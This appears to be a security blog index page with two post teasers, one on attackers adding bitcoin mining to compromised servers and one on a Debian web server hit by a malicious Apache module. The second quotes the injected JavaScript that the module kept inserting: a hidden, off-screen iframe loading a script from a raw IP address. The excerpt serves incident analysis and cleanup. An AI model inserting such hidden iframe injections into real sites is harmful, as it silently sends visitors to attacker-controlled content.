Game of Coins: The Uprise of Bitcoin Mining

May 2, 2013 by Leave a Comment

Research by Daniel Cid. Authored by Dre Armeda.

One thing you can’t take away from some of the attackers we deal with everyday is their creativity. From time to time we write about new trends we’re seeing, and this post is no different. We’re seeing a new tactic recently, and it may be affecting your pockets, even if you’re not into the latest trend of using digital currency.

Game of Coins

Digital currency you say?

I sure did! Bitcoin to be exact.

Read More

Filed Under: backdoors, bitcoin, Malware, security, Server Compromise, sucuri, vulnerability Tagged With: , , , , ,

Web Server Compromise – Debian Distro – Identify and Remove Corrupt Apache Modules

February 6, 2013 by 6 Comments

Came across another server compromise this week. Client was complaining that the following kept being injected into their JavaScript files:

document.write("<style.vb4brk { position:absolute; left:-1655px; top:-1476px} </style> 
<div class="vb4rk"><iframe 
src="httx:// 149.47.154.253/fee1f3119b234cb79f953e92281b12af/q.php" width="231" height="330">
</iframe></div>'); /*!

Fortunately, the client was working off a VPS. Doing so allowed us to dig deeper into the server and better address the issue. Looking at the server we quickly realized that a bad module had been injected. Unfortunately, because this was a Debian distribution, as such you can’t run the commands we provided in our last post.

Read More

Filed Under: apache, awareness, malware cleanup, plesk, Server Compromise, sucuri Tagged With: , , , ,